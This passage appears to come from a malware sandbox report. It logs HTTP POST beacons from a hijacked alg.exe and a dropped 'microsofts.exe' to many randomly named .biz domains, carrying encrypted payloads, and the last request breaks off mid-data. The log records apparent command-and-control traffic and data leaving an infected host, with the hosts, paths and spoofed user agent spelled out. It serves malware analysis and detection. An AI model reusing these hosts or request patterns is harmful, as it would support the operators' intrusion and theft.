                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.608021021 CET360OUTPOST /ywcfdqaloklmslqo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.608048916 CET778OUTData Raw: 73 fc e2 9f 48 1d de cf fe 02 00 00 44 69 1d 23 2b 36 03 eb f0 14 76 9a 1c 5b df dc dc 10 c0 8e 5c 3a ca a1 e7 79 40 90 5a 10 c7 2d eb 3e 0a b5 2d 72 96 a9 02 56 56 0a ab f2 d4 a2 ad 72 18 18 0c c9 ed d5 14 56 74 5e 7b 4d 9d bd ef 9b f3 3c 87 7e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sHDi#+6v[\:y@Z->-rVVrVt^{M<~wbMIE!i(LJzu\NV6J<CMn+Zia'W(mek75#}yIqPo3#X}p|SoAisvY\cS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.753660917 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              33192.168.2.55956213.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989689112 CET344OUTPOST /nw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989715099 CET778OUTData Raw: 9f c0 52 67 bc 32 da 78 fe 02 00 00 06 87 97 ed 8e d1 49 a0 e8 aa f9 ae 12 6c 32 72 da 8c f8 ac f3 cb 36 b9 a0 bc 41 74 c1 a1 70 7e dd b4 81 97 ae d6 9d 77 a0 3e dc c3 fa 87 7d 11 6d 8b c3 be 0d 23 d2 e4 c4 70 de e5 47 84 b4 2b 7a 8f 57 c6 72 08
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Rg2xIl2r6Atp~w>}m#pG+zWrM+nloVfUIzs,2dPt<]KFRH&j*9]YW6A,iLnwOmnQZLN|FyR}o)9LhnfIw
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.456079960 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7ada31002f6a76ab3f5be16937b945e2|173.254.250.76|1730822610|1730822610|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              34192.168.2.55957444.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.969162941 CET349OUTPOST /daho HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.969263077 CET778OUTData Raw: fa 44 ef 46 6e df 7c c6 fe 02 00 00 ca ff 59 59 d9 63 a7 ec bb a5 a8 42 42 8b 67 68 8b cf e3 e8 2b 20 eb 77 cc be e5 c6 3b 6b bf 25 5b 2b 2d 7d e3 6a 09 21 8d 1b 25 c0 0b a1 65 1e aa bd a5 a1 bb a1 15 a1 a6 5c cf cd 21 54 7d 3a 32 cb d6 ed 71 d6
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: DFn|YYcBBgh+ w;k%[+-}j!%e\!T}:2qmsA2)/T;(Y?\aS:wO&wt!`<}LZBp!dByQSK|=-%`vOnND? ['8ei?;1:.tqb:L2e0D
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.630348921 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=50b396ec84842dbc7b922d0fb8e1567f|173.254.250.76|1730822612|1730822612|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              35192.168.2.55958054.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828912020 CET347OUTPOST /txk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828931093 CET778OUTData Raw: 3b 9d f8 d7 1a 9f 59 c0 fe 02 00 00 77 d9 14 74 f0 d6 38 02 5b cd 5a f4 3c 8b f3 28 bb ba fd 53 32 fe 52 04 e4 e2 e9 29 94 aa 5f f9 8d e6 10 df cc f7 03 56 f4 07 1e 0a f8 25 84 79 ce fd ca f4 73 ff 62 e1 c8 92 d8 02 ba 79 9b 5b 06 f1 b2 a1 22 cc
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ;Ywt8[Z<(S2R)_V%ysby["laY%_9j%^CF58^+I>oZwWt]p*?IVBfs-PU!=o_QuGT!5+j^!qa<
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.667948961 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=07359a273a73a0fc5e0d1296c0068790|173.254.250.76|1730822613|1730822613|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              36192.168.2.55958647.129.31.212801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.985902071 CET356OUTPOST /bcfyebuhgunon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.985923052 CET828OUTData Raw: 1c 76 03 bf d3 68 27 a2 30 03 00 00 89 24 cd 86 21 27 a7 b5 1a 20 28 77 65 98 34 a5 2b 76 f3 0e 6f e3 7a 75 c4 ca 94 4e a2 86 36 97 de dc 4b 5e 2b cf fb 08 b0 82 69 7a 12 ef ae 4c a6 56 39 98 38 43 fb c4 de 72 d8 25 92 0c a0 ac 38 c0 4b 36 82 72
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: vh'0$!' (we4+vozuN6K^+izLV98Cr%8K6rnAU&$dh9Pru95*O~:[Dy@zygL^riYu<qL0kaK0AGtj]D!FRuqH]YVrY+2!CR]\b
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.413471937 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=31fe77a86b4e64a8b42891334e59ca95|173.254.250.76|1730822614|1730822614|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              37192.168.2.55959235.164.78.200801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999886990 CET351OUTPOST /vvpppdyli HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999911070 CET778OUTData Raw: 42 cd 73 9d ff a6 fb 0f fe 02 00 00 33 36 cb d3 14 68 79 a4 c9 c1 ba ab ff 70 ad fd 03 28 ad 54 a6 35 76 b6 cd d7 ce b0 7e 5e f9 4c ea 1e 57 52 39 4b a9 11 78 2f 7f 29 bd fb 57 61 b1 6f 3a 40 3a e1 86 2c 04 17 eb e1 72 b9 ca 66 c7 8e 3f 31 d4 2d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Bs36hyp(T5v~^LWR9Kx/)Wao:@:,rf?1-\eq_]8UZsj%33&ihGZ k/H6u;)3G>=|Kc]P-*O)i6QS%u!'?:;M]i=<yT 4T_#5="
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.824301958 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=647ca644de4696c438ee1e927eb9a508|173.254.250.76|1730822614|1730822614|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              38192.168.2.55959313.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459052086 CET348OUTPOST /wyuhsg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459069967 CET828OUTData Raw: 16 f2 f0 f3 e6 47 e6 71 30 03 00 00 ca ff e6 4a bd 65 96 fb 5a 7d 4e 1c e8 f5 79 dc b5 b2 7e eb 2e e9 dd 64 af aa 72 63 31 eb a1 a3 21 d6 e3 33 2e cd e9 2f 33 40 0f ca 83 d7 f6 a9 77 22 94 32 c2 a3 6e 88 cc 88 28 3d 7e d9 07 b1 54 f9 e6 9e e6 b3
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Gq0JeZ}Ny~.drc1!3./3@w"2n(=~TH/4V2;OdrjncMS$"y,)W>XU3+.08{A\*@i75j]'cI-tnq~5$$l~cZL:{!DZdoTNeFY.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.878051043 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=32ce63649b2fb1c6b045dc2d75e0cd03|173.254.250.76|1730822615|1730822615|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              39192.168.2.5595993.94.10.34801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019838095 CET358OUTPOST /fgdugwxcbebce HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019853115 CET778OUTData Raw: 83 f2 3e c3 67 96 a6 cb fe 02 00 00 e1 00 e8 25 9d 3a cb 4a 33 35 25 a2 14 49 77 5c e5 88 59 a6 06 7c 8c 64 fa ff 65 ab 38 26 19 31 fa ab f8 dc 5e fe 0f 01 0c a8 7a 94 05 1e 12 0e 76 0c 41 dd c9 5d f2 eb 49 46 50 7a 31 47 aa 5f a5 30 24 b5 3c 10
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: >g%:J35%Iw\Y|de8&1^zvA]IFPz1G_0$<(A|w,U_%h_fjgKW[J8t*s31iVkxLomw=C?^"'|j*sM4i35I}6KAeP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.692034006 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5ba3b748ac47479a56ed259b42fa3597|173.254.250.76|1730822615|1730822615|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              40192.168.2.559604165.160.15.20801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533978939 CET352OUTPOST /ahktjonxxxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.534085989 CET778OUTData Raw: 56 db ba 87 d4 01 b1 ab fe 02 00 00 25 a2 c6 47 b9 50 13 e6 cc 1c f6 df f1 81 89 52 62 65 38 b3 12 db e1 04 d6 86 f3 13 60 32 4c a7 95 32 3b 0f d7 df b7 3c f9 08 dd 10 e7 33 74 d7 d8 fe 41 b0 df 10 61 b8 56 da 43 e4 98 b0 4f ed 3e 25 ea 2c 5a 34
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V%GPRbe8`2L2;<3tAaVCO>%,Z4c}[T_sp)("Qd!Mb:0_J?Z[$@)s9kSTw7gXh~Vd|3lD9&:UV+7iz+Ed~G//.#
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233697891 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267164946 CET345OUTPOST /mwix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267232895 CET778OUTData Raw: e8 54 2a 84 4f 18 34 ab fe 02 00 00 aa 72 5e 55 04 e6 8d 9a 73 b0 1d 7a 01 d4 65 ea 4a bb 05 3e 70 cf a1 6a 9c 62 e4 10 52 ab 75 d6 d7 a0 2e 99 81 09 11 b7 04 5a 43 07 a2 68 c5 35 85 35 76 1f d3 63 8a f5 16 f1 c1 d2 61 b8 e2 c3 f0 7e 36 b6 b3 de
